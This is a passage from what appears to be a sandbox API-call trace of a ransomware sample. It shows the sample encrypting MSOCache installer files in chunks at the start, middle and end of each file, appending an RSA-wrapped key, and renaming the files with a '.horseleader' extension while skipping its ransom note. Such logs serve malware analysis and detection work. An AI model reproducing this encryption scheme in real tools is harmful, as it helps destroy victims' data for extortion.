Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0223.798] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0223.798] StrStrW (lpFirst="setup.exe", lpSrch=".txt") returned 0x0 [0223.798] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1377656) returned 1 [0223.798] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.798] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.801] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.801] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.802] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa5abc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.802] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.804] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.804] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.805] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x14b578, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.805] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.807] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.807] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.808] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.808] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.808] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0223.808] CloseHandle (hObject=0x21c) returned 1 [0223.809] GetProcessHeap () returned 0x780000 [0223.809] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.809] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.horseleader") returned 88 [0223.809] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.horseleader")) returned 1 [0223.810] GetProcessHeap () returned 0x780000 [0223.810] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.810] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80aa51d0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80aa51d0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x4a6d3200, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x5061, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0223.810] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0223.810] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0223.810] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0223.810] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0223.810] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0223.810] lstrlenW (lpString=".testttjffg") returned 11 [0223.810] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0223.810] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0223.810] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0223.810] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0223.811] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0223.811] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0223.811] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=20577) returned 1 [0223.811] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.814] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.814] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.814] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x61, lpOverlapped=0x0) returned 1 [0223.815] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffff9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.815] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x61, lpOverlapped=0x0) returned 1 [0223.815] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.815] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.815] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0223.816] CloseHandle (hObject=0x21c) returned 1 [0223.816] GetProcessHeap () returned 0x780000 [0223.816] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.816] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0223.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0223.817] GetProcessHeap () returned 0x780000 [0223.817] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.817] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x749b0240, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x749b0240, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x46a46a30, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb9fa2f7, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisiorWW.cab", cAlternateFileName="")) returned 1 [0223.817] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="Windows") returned -1 [0223.817] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 79 [0223.817] StrStrIW (lpFirst="VisiorWW.cab", lpSrch=".horseleader") returned 0x0 [0223.817] lstrcmpW (lpString1="VisiorWW.cab", lpString2="#Decrypt#.txt") returned 1 [0223.817] lstrcmpW (lpString1="VisiorWW.cab", lpString2="_uninstalling_.png") returned 1 [0223.817] lstrlenW (lpString=".testttjffg") returned 11 [0223.817] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab", lpSrch=".testttjffg") returned 0x0 [0223.817] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0223.818] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0223.818] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0223.819] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 79 [0223.819] StrStrW (lpFirst="VisiorWW.cab", lpSrch=".txt") returned 0x0 [0223.819] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=195011319) returned 1 [0223.819] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.819] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.829] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.829] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.829] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5cfa97b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.829] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.834] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.834] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.835] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb9f52f7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.835] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.838] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.839] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.839] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.839] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.839] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0223.839] CloseHandle (hObject=0x21c) returned 1 [0223.840] GetProcessHeap () returned 0x780000 [0223.840] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.840] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.horseleader") returned 91 [0223.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.horseleader")) returned 1 [0223.841] GetProcessHeap () returned 0x780000 [0223.841] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.841] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80711960, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80711960, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468ee660, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb80800, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisiorWW.msi", cAlternateFileName="")) returned 1 [0223.841] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="Windows") returned -1 [0223.841] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 79 [0223.841] StrStrIW (lpFirst="VisiorWW.msi", lpSrch=".horseleader") returned 0x0 [0223.841] lstrcmpW (lpString1="VisiorWW.msi", lpString2="#Decrypt#.txt") returned 1 [0223.841] lstrcmpW (lpString1="VisiorWW.msi", lpString2="_uninstalling_.png") returned 1 [0223.841] lstrlenW (lpString=".testttjffg") returned 11 [0223.841] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi", lpSrch=".testttjffg") returned 0x0 [0223.841] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0223.841] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0223.841] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0223.842] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 79 [0223.842] StrStrW (lpFirst="VisiorWW.msi", lpSrch=".txt") returned 0x0 [0223.842] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=12060672) returned 1 [0223.842] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.842] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.889] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.889] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.890] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5bdc00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.890] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.894] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.894] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.895] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb7b800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.895] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.899] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.899] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.899] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.900] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.900] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0223.900] CloseHandle (hObject=0x21c) returned 1 [0223.902] GetProcessHeap () returned 0x780000 [0223.902] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.902] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.horseleader") returned 91 [0223.902] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.horseleader")) returned 1 [0223.903] GetProcessHeap () returned 0x780000 [0223.903] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.903] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 1 [0223.903] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="Windows") returned -1 [0223.903] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0223.903] StrStrIW (lpFirst="VisiorWW.xml", lpSrch=".horseleader") returned 0x0 [0223.903] lstrcmpW (lpString1="VisiorWW.xml", lpString2="#Decrypt#.txt") returned 1 [0223.903] lstrcmpW (lpString1="VisiorWW.xml", lpString2="_uninstalling_.png") returned 1 [0223.903] lstrlenW (lpString=".testttjffg") returned 11 [0223.903] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", lpSrch=".testttjffg") returned 0x0 [0223.903] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0223.903] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0223.903] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0223.904] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0223.904] StrStrW (lpFirst="VisiorWW.xml", lpSrch=".txt") returned 0x0 [0223.904] GetFileSizeEx (in: 